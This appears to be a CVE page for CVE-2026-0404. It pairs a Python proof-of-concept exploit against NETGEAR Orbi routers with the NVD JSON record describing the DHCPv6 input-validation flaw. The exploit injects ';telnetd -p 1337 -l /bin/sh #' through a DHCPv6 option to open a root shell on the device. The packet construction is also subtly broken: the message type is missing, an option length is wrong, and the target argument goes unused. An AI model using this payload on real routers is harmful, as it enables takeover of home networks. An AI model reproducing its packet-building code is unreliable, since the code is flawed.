CVE-2026-0404

#!/usr/bin/env python3 # CVE-2026-0404 PoC - NETGEAR Orbi DHCPv6 Command Injection # Author: Security Researcher # Note: For authorized security testing only import socket import struct import sys from datetime import datetime def build_dhcpv6_packet(): """Build malicious DHCPv6 packet with command injection payload""" # DHCPv6 Message Type: Solicit (1) transaction_id = b'\x00\x00\x01' # Client Identifier Option (1) - DUID-LL duid = b'\x00\x03\x00\x00\x00\x01\x00\x01' duid += b'\x12\x34\x56\x78\x9a\xbc' # Hardware address client_id = b'\x00\x01' + struct.pack('>H', len(duid)) + duid # INJECTED PAYLOAD - Command injection in Option 39 (User Class) # This demonstrates the vulnerability where shell commands can be injected injected_cmd = ';telnetd -p 1337 -l /bin/sh #' # Example: Enable telnet # Encoded as DHCPv6 option payload = injected_cmd.encode('utf-8') user_class_option = b'\x00\x27' + struct.pack('>H', len(payload)) + payload # Reordered Options (9) - Request specific options option_request = b'\x00\x06\x00\x04\x00\x17\x00\x18' # Vendor Class Option (16) - Another injection point vendor_class = b'\x00\x10\x00\x1eNETGEAR Orbi' # Assemble the packet packet = transaction_id + client_id + user_class_option + option_request + vendor_class return packet def send_exploit(target_ip, target_port=547): """Send the malicious DHCPv6 packet""" print(f"[*] Building malicious DHCPv6 packet for {target_ip}") print(f"[*] Target: NETGEAR Orbi Router") print(f"[*] Vulnerability: CVE-2026-0404 - DHCPv6 Command Injection") # Create UDP socket for DHCPv6 sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM) # Multicast address for DHCPv6 servers multicast_addr = 'ff02::1:2' packet = build_dhcpv6_packet() print(f"[*] Sending malicious DHCPv6 Solicit packet...") print(f"[*] Packet size: {len(packet)} bytes") print(f"[*] Injection payload: Command injection in DHCPv6 options") try: sock.sendto(packet, (multicast_addr, target_port)) print(f"[+] Packet sent successfully") print(f"[!] If DHCPv6 is enabled and vulnerable, command will be executed") except Exception as e: print(f"[-] Error sending packet: {e}") finally: sock.close() def main(): if len(sys.argv) < 2: print("Usage: python3 cve-2026-0404_poc.py <target_ip>") print("Example: python3 cve-2026-0404_poc.py 192.168.1.1") sys.exit(1) target = sys.argv[1] print(f"[*] CVE-2026-0404 - NETGEAR Orbi DHCPv6 Command Injection PoC") print(f"[*] Target: {target}") print(f"[*] Time: {datetime.now()}") send_exploit(target) if __name__ == "__main__": main()

{"cve": {"id": "CVE-2026-0404", "sourceIdentifier": "a2826606-91e7-4eb6-899e-8484bd4575d5", "published": "2026-01-13T16:16:10.343", "lastModified": "2026-02-12T17:36:09.760", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An insufficient input validation vulnerability in NETGEAR Orbi devices' \nDHCPv6 functionality allows network adjacent attackers authenticated \nover WiFi or on LAN to execute OS command injections on the router. \nDHCPv6 is not enabled by default."}, {"lang": "es", "value": "Una vulnerabilidad de validación de entrada insuficiente en la funcionalidad DHCPv6 de los dispositivos NETGEAR Orbi permite a atacantes adyacentes a la red, autenticados a través de WiFi o en la LAN, ejecutar inyecciones de comandos del sistema operativo en el router. DHCPv6 no está habilitado por defecto."}], "metrics": {"cvssMetricV40": [{"source": "a2826606-91e7-4eb6-899e-8484bd4575d5", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:N/R:U/V:D/RE:M/U:Amber", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NO", "Recovery": "USER", "valueDensity": "DIFFUSE", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "AMBER"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.9}]}, "weaknesses": [{"source": "a2826606-91e7-4eb6-899e-8484bd4575d5", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:netgear:rbr750_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.2.8.5", "matchCriteriaId": "0D73C133-BD68-4532-B267-61796ECB1A07"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:netgear:rbr750:-:*:*:*:*:*:*:*", "matchCriteriaId": "C13F5C69-FA9B-472A-9036-0C2967BDCDE9"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:netgear:rbr840_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.2.8.5", "matchCriteriaId": "9C730F75-337C-44C5-9DE7-E532D7C3C8BC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:netgear:rbr840:-:*:*:*:*:*:*:*", "matchCriteriaId": "4489CB05-A1C0-408C-8D8C-56EE98CA20E8"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:netgear:rbr850_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.2.8.5", "matchCriteriaId": "7E5B3B94-CC3D-4CFC-9FE2-9EF5CEBD4B1A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:netgear:rbr850:-:*:*:*:*:*:*:*", "matchCriteriaId": "D92E4C8E-222A-476C-8273-F7171FC61F0B"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:netgear:rbr860_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.2.8.5", "matchCriteriaId": "659D5BE0-C045-48FD-9214-B35D408AF0BA"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:netgear:rbr860:-:*:*:*:*:*:*:*", "matchCriteriaId": "928FC2C1-4D05-495B-ACD8-1D013EB18EE6"}]}]}, {"operator": "AND", "nodes": [{"operator": ... (truncated)